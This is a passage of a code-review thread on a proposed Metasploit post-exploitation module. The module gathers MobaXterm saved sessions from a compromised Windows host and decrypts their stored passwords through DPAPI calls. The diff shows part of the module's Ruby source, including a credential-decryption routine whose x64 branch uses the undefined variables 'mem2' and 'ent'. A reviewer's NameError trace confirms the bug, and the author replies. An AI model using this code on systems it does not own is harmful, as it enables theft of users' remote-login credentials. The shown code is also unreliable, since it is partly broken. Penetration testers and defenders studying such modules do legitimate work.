modules/post/windows/gather/credentials/moba_xterm.rb

```diff
@@ -0,0 +1,330 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+# @blurbdust based this code off of https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb
+# and https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/enum_ms_product_keys.rb
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather MobaXterm Passwords',
+        'Description' => %q{
+          This module will determine if MobaXterm is installed on the target system and, if it is, it will try to
+          dump all saved session information from the target. The passwords for these saved sessions will then be decrypted
+          where possible, using the decryption information that HyperSine reverse engineered.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://blog.kali-team.cn/Metasploit-MobaXterm-0b976b993c87401598be4caab8cbe0cd' ]
+        ],
+        'Author' => ['Kali-Team <kali-team[at]qq.com>'],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        },
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_railgun_api
+              stdapi_railgun_api_multi
+              stdapi_railgun_memread
+              stdapi_railgun_memwrite
+              stdapi_sys_process_get_processes
+            ]
+          }
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('MASTER_PASSWORD', [ false, 'If you know the password, you can skip decrypting the master password. If not, it will be decrypted automatically']),
+        OptString.new('CONFIG_PATH', [ false, 'Specifies the config file path for MobaXterm']),
+      ]
+    )
+  end
+
+  def windows_unprotect(entropy, data)
+    rg = session.railgun
+    pid = session.sys.process.getpid
+    process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
+    mem = process.memory.allocate(data.length)
+    addr_entropy = session.railgun.util.alloc_and_write_string(entropy)
+    process.memory.write(mem, data)
+    if session.sys.process.each_process.find { |i| i['pid'] == pid } ['arch'] == 'x86'
+      addr = [mem].pack('V')
+      len = [data.length].pack('V')
+      elen = [entropy.length].pack('V')
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{[addr_entropy].pack('V')}", nil, nil, 0, 8)
+      len, addr = ret['pDataOut'].unpack('V2')
+    else
+      addr = Rex::Text.pack_int64le(mem)
+      len = Rex::Text.pack_int64le(data.length)
+      eaddr = Rex::Text.pack_int64le(mem2)
+      elen = Rex::Text.pack_int64le(ent.length)
```

Comment:
Variables `mem2` and `ent` do not exist in the given context. I tried to resolve this issue but continued getting errors further on in execution. Could you please investigate this @cn-kali-team? 

```
msf6 post(windows/gather/credentials/moba_xterm) > run

[*] Gathering MobaXterm session information from DESKTOP-BE1QFC9
[-] Post failed: NameError undefined local variable or method `mem2' for #<Module:post/windows/gather/credentials/moba_xterm datastore=[{"WORKSPACE"=>nil, "VERBOSE"=>true, "SESSION"=>6, "MASTER_PASSWORD"=>nil, "CONFIG_PATH"=>nil}]>
Did you mean?  mem
[-] Call stack:
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/post/windows/gather/credentials/moba_xterm.rb:72:in `windows_unprotect'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/post/windows/gather/credentials/moba_xterm.rb:128:in `mobaxterm_crypto_safe'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/post/windows/gather/credentials/moba_xterm.rb:171:in `block in gather_password'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/post/windows/gather/credentials/moba_xterm.rb:166:in `each_key'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/post/windows/gather/credentials/moba_xterm.rb:166:in `gather_password'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/post/windows/gather/credentials/moba_xterm.rb:272:in `block in run'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/post/windows/gather/credentials/moba_xterm.rb:261:in `each'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/post/windows/gather/credentials/moba_xterm.rb:261:in `run'
[*] Post module execution completed
```

Reply:
Sorry, I only tested the x32 operating system, but not the x64 operating system. Maybe this code is copied from `modules/post/windows/gather/credentials/pulse_secure.rb` The decrypt of the secure.rb file `decrypt_reg` function

Reply:
I saw a lot of places to use Windows's Crypt's decryption function, whether there is planned to join the built-in method